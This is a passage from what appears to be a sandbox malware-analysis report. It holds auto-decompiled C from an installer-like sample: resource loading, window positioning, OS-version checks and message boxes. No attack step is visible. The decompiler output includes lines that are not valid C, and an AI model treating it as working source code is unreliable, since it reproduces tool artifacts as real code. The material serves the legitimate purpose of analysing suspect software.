                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00F36CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F32AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F32AF2
                                                                        • CharNextA.USER32(?), ref: 00F32B12
                                                                        • CharUpperA.USER32 ref: 00F32B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00F32B55
                                                                        • CharNextA.USER32(?), ref: 00F32BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: d48dc3baa238f6f957180c1cdff8ae2959bb9614f0a24223c69f37300ae1e7e0
                                                                        • Instruction ID: a8d1733eb7abdbbaebe60c3077966aeb64eaa6fb005d482f22a413306aba017a
                                                                        • Opcode Fuzzy Hash: d48dc3baa238f6f957180c1cdff8ae2959bb9614f0a24223c69f37300ae1e7e0
                                                                        • Instruction Fuzzy Hash: 9A414B349042899FDF559F349C54AFDBB6A9F92330F0440DAE8C283202DF354E46EB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00F343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00F36CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00F343F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F3440B
                                                                        • GetDC.USER32(?), ref: 00F34423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F3442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F3443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F34447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F344A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 6c06ff2d5dc526cb11855aff7ec50648d25c8138ec36d6c394ccd45f377df7e7
                                                                        • Instruction ID: 38555c31e51698dc9385feffcda605d33551ea6e16978bd84e12ca44a7bfd1dd
                                                                        • Opcode Fuzzy Hash: 6c06ff2d5dc526cb11855aff7ec50648d25c8138ec36d6c394ccd45f377df7e7
                                                                        • Instruction Fuzzy Hash: 56314C72E0011DAFCB14DFB9DD899EEBBB6EB89320F154169F805F3250DA30AD059B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00F36298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00F3171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xf3a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00F3171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00F36CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F362CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F362D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F3631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F36345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F36357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: af4f895ed3716b29484c1c9bc1b51ca445d2886f5f69f129578b71184609b413
                                                                        • Instruction ID: 54a594ff12820faa4ed68e9f17a3e67d48ceea550d0b6636afafef6a8429eb37
                                                                        • Opcode Fuzzy Hash: af4f895ed3716b29484c1c9bc1b51ca445d2886f5f69f129578b71184609b413
                                                                        • Instruction Fuzzy Hash: 0C21F371A00219ABDB14AFA58C459BFBB79FF48730F044129F942E3241DB799D02ABE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F3681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xf381d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xf381d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xf381d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xf31140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00F366F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xf381d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}



















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F3686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00F368A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F368CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,?,0000000C), ref: 00F368F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F36902
                                                                          • Part of subcall function 00F366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F3691A), ref: 00F36741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00F368C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 7b4a10b4ef156828bbef13222eacc72706cfd9e57fdf895a363449468f4cd6bd
                                                                        • Instruction ID: c0941e2a8b48279a07a137ca81030953e490e9f1eccd0641c4d286409e92a21f
                                                                        • Opcode Fuzzy Hash: 7b4a10b4ef156828bbef13222eacc72706cfd9e57fdf895a363449468f4cd6bd
                                                                        • Instruction Fuzzy Hash: E231DF71E01318AFDB21CB11CC04BAAB7B9FB41378F1040A5E949E2140CBB09E8AEF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00F3468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xf38d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00F3468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xf38d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xf38d4c);
                                                                        							L9:
                                                                        							 *0xf39124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00F36517(_t19, 0x7d1, 0, E00F33100, 0, 0);
                                                                        						LocalFree( *0xf38d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xf39124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xf38d4c);
                                                                        					 *0xf39124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf39124 = E00F36285();
                                                                        				goto L2;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F64,?,00000002,00000000), ref: 00F33A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F33AB3
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F33AD0
                                                                        • LocalFree.KERNEL32 ref: 00F33B13
                                                                          • Part of subcall function 00F36517: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                          • Part of subcall function 00F36517: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                          • Part of subcall function 00F36517: DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                          • Part of subcall function 00F36517: FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        • LocalFree.KERNEL32(00000000,00F33100,00000000,00000000), ref: 00F33AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 48751d0def6b250d4bf32361c10ebbe83bf791dbffb8e918e3ff7579db90b76b
                                                                        • Instruction ID: 8d3e9c16ae0aac068732ceb67fed223eb9d58b689dc18a62a7f14fc270a84ff6
                                                                        • Opcode Fuzzy Hash: 48751d0def6b250d4bf32361c10ebbe83bf791dbffb8e918e3ff7579db90b76b
                                                                        • Instruction Fuzzy Hash: B511B471600209ABD724EF329C09E1779ABEBD5770F10402EB981E71A1DEBDD801B621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F324E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00F3658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F32506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F3252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00F3253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F3254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00F32555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: b704e4ac14373d97579a92b789ad3d5694c9a59a6bb6faa013639590bb80b3eb
                                                                        • Instruction ID: 276728ff0b5df38ef8724452d27a3ee160108d00da0abddf15bc1c4b8539bd05
                                                                        • Opcode Fuzzy Hash: b704e4ac14373d97579a92b789ad3d5694c9a59a6bb6faa013639590bb80b3eb
                                                                        • Instruction Fuzzy Hash: 7801B572A0011867C7609B669C0CEDF7B7DEB45771F000155FA89D3190DE748E45DA91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F336EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xf38184 = 1;
                                                                        						 *0xf38180 = 1;
                                                                        						L13:
                                                                        						 *0xf39a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xf38a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00F32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00F32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xf38a38 & 0x00000001;
                                                                        											if(( *0xf38a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("lenta");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00F3681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00F367C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
